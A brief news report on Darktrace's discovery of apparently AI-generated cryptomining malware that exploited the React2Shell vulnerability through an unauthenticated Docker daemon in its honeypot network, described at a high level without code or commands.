A new class of cyberattack has been caught in the wild, where the code is AI-generated, with Darktrace releasing a report detailing an intrusion into its CloudyPots honeypot network that revealed a fully AI-generated malware sample designed to exploit the React2Shell vulnerability (CVE-2025-55182). The attack began by targeting an internet-facing Docker daemon that was left unauthenticated, with the attacker spawning a container named “python-metrics-collector” to blend in with normal cloud activity.
Inside the container, the startup command installed curl, wget and python3, then downloaded and executed a Python script that Darktrace analysis confirmed was fully AI-generated. According to Darktrace, the incident marks a shift in the threat landscape where AI-assisted software development (“vibecoding”) enables attackers to rapidly produce functional tooling, allowing even low-skill operators to punch above their weight.
The malware was designed to mine Monero (XMR) using the XMRig miner (version 6.21.0), but it was configured to use a public mining pool, supportxmr[.]com, which made earnings statistics publicly visible and traceable. The rapid deployment of AI-written malware against a critical vulnerability like React2Shell signals that attack speed is accelerating, forcing defenders to contend with a flood of AI-generated variations produced as quickly as a prompt can be typed.